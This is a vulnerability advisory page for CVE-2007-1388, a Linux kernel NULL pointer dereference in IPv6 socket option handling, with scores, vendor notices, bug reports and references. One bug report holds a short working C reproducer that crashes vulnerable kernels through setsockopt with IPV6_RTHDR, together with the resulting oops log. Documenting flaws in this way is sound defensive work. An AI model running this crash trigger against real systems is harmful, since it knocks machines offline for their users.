CVE-2007-1388
Published 2007-03-10. Priority P4. CVSS 2.0 base score 4.4 (medium), vector AV:L/AC:M/Au:S/C:N/I:N/A:C. EPSS 0.55% (41.8th percentile).
The do_ipv6_setsockopt function in net/ipv6/ipv6_sockglue.c in Linux kernel before 2.6.20, and possibly other versions, allows local users to cause a denial of service (oops) by calling setsockopt with the IPV6_RTHDR option name and possibly a zero option length or invalid option value, which triggers a NULL pointer dereference.
Affected
141 ranges listed; only the first carries version data:
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| linux | linux_kernel | <= 2.6.19.7 | — |
CVSS provenance
| Source | CVSS version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | 2.0 | 4.4 | MEDIUM | AV:L/AC:M/Au:S/C:N/I:N/A:C |
| vendor_ubuntu | — | 7.8 | HIGH | — |
| vendor_redhat | — | 4.4 | MEDIUM | — |
GHSA
GHSA-c6w9-v295-wr3x · ghsa_unreviewed · 2022-05-01 · MEDIUM
Description: same text as the CVE description above.
Ubuntu
Linux kernel vulnerabilities · vendor_ubuntu · 2007-05-24 · CVSS 7.8 · listed under CVE-2007-1357 [HIGH]
Philipp Richter discovered that the AppleTalk protocol handler did not sufficiently verify the length of packets. By sending a crafted AppleTalk packet, a remote attacker could exploit this to crash the kernel. (CVE-2007-1357)

Gabriel Campana discovered that the do_ipv6_setsockopt() function did not sufficiently verify option values for IPV6_RTHDR. A local attacker could exploit this to trigger a kernel crash. (CVE-2007-1388)

A Denial of Service vulnerability was discovered in the nfnetlink_log() netfilter function. A remote attacker could exploit this to trigger a kernel crash. (CVE-2007-1496)

The connection tracking module for IPv6 did not properly handle the status field when reassembling fragmented packets,
Red Hat
security flaw · vendor_redhat · 2007-03-08 · CVSS 4.4 [MEDIUM]
Description: same text as the CVE description above.
No detection rules found.
Bugzilla
CVE-2007-1388 security flaw · bugzilla · 2018-08-16 · CVSS 4.4 [MEDIUM]
Flaw bug created to hold information about an old flaw we knew something about. For more details see the MITRE CVE description.
Discussion: MITRE description, same text as the CVE description above.
Bugzilla
CVE-2007-1388 NULL pointer dereference in do_ipv6_setsockopt · bugzilla · 2007-03-14 · CVSS 4.4 [MEDIUM]
There is a NULL pointer dereference in the function do_ipv6_setsockopt in net/ipv6/ipv6_sockglue.c.
Line 417, opt can be NULL and dereferenced:
```c
opt = ipv6_renew_options(sk, np->opt, optname,    // opt = NULL
                         (struct ipv6_opt_hdr __user *)optval,
                         optlen);
if (IS_ERR(opt)) {
        retv = PTR_ERR(opt);
        break;
}
/* routing header option needs extra check */
if (optname == IPV6_RTHDR && opt->srcrt) {        // Oops
```
Those few lines reproduce the bug:
```c
#include <sys/socket.h>
#include <netinet/in.h>

int main(int argc, char **argv) {
    int s, optval;
    s = socket(AF_INET6, SOCK_STREAM, IPPROTO_TCP);
    /* zero option length: ipv6_renew_options() hands back NULL, which IS_ERR() does not catch */
    setsockopt(s, SOL_IPV6, IPV6_RTHDR, &optval, 0);
    return 0;
}
```
Kernel Oops here:
```
Mar 8 23:57:17 localhost kernel: BUG: unable to handle kernel NULL pointer
dereference at virtual address 0
```
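The defect the report describes is that ipv6_renew_options() can return a plain NULL for an empty option while IS_ERR() only recognises encoded error pointers. The example below is added here and is not code from the bug report or the kernel: it uses userland copies of the ERR_PTR helpers, a hypothetical stand-in renew_options(), and the check as reported beside the same check with a NULL guard, so the gap between "error pointer" and "NULL" can be tested directly.

```c
#include <errno.h>
#include <stddef.h>
#include <stdint.h>

/* Userland copy of the kernel's ERR_PTR convention: an error is a negative
 * errno stored in the pointer bits, so it occupies the top MAX_ERRNO
 * addresses. NULL (address 0) lies outside that window, which is why
 * IS_ERR() lets it through. */
#define MAX_ERRNO 4095
static void *ERR_PTR(long err) { return (void *)err; }
static long PTR_ERR(const void *p) { return (long)p; }
static int IS_ERR(const void *p) { return (uintptr_t)p >= (uintptr_t)-MAX_ERRNO; }
static int IS_ERR_OR_NULL(const void *p) { return p == NULL || IS_ERR(p); }

struct ipv6_txoptions { void *srcrt; };      /* only the field the check reads */
static int rthdr_marker;                     /* stands in for a routing header */
static struct ipv6_txoptions with_rthdr = { .srcrt = &rthdr_marker };

/* Hypothetical stand-in for ipv6_renew_options() (constructed, not the
 * kernel's code): zero length means "drop the option" and yields NULL,
 * a rejected value yields ERR_PTR(-EINVAL), anything else a valid object. */
static struct ipv6_txoptions *renew_options(int optlen, int valid) {
    if (optlen == 0) return NULL;
    if (!valid) return ERR_PTR(-EINVAL);
    return &with_rthdr;
}

/* Shape of the check from the report. Returns 1 when the code would read
 * opt->srcrt through a NULL pointer (the oops), 0 otherwise. */
static int rthdr_check_vulnerable(int optlen, int valid) {
    struct ipv6_txoptions *opt = renew_options(optlen, valid);
    if (IS_ERR(opt)) return 0;           /* only encoded errors are caught */
    if (opt == NULL) return 1;           /* original code: opt->srcrt here */
    return 0;
}

/* Same check with a NULL guard in front of the dereference. Returns a
 * negative errno on error, 1 when a routing header is present and needs
 * the extra validation, 0 when there is nothing to check. */
static int rthdr_check_guarded(int optlen, int valid) {
    struct ipv6_txoptions *opt = renew_options(optlen, valid);
    if (IS_ERR(opt)) return (int)PTR_ERR(opt);
    if (opt && opt->srcrt) return 1;     /* the guard: NULL means no options */
    return 0;
}
```

A zero optlen is the input from the reproducer above; the vulnerable shape reports a NULL read for it, the guarded shape treats it as "no routing header" and returns 0.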
References
- http://bugzilla.kernel.org/show_bug.cgi?id=8155
- http://lists.suse.com/archive/suse-security-announce/2007-May/0001.html
- http://secunia.com/advisories/24777
- http://secunia.com/advisories/24901
- http://secunia.com/advisories/25080
- http://secunia.com/advisories/25099
- http://secunia.com/advisories/25392
- http://www.kernel.org/pub/linux/kernel/v2.6/ChangeLog-2.6.20.4
- http://www.mandriva.com/security/advisories?name=MDKSA-2007:078
- http://www.redhat.com/support/errata/RHSA-2007-0169.html
- http://www.securityfocus.com/bid/23142
- http://www.ubuntu.com/usn/usn-464-1
- http://www.vupen.com/english/advisories/2007/1122
- https://issues.rpath.com/browse/RPL-1154
- https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A11509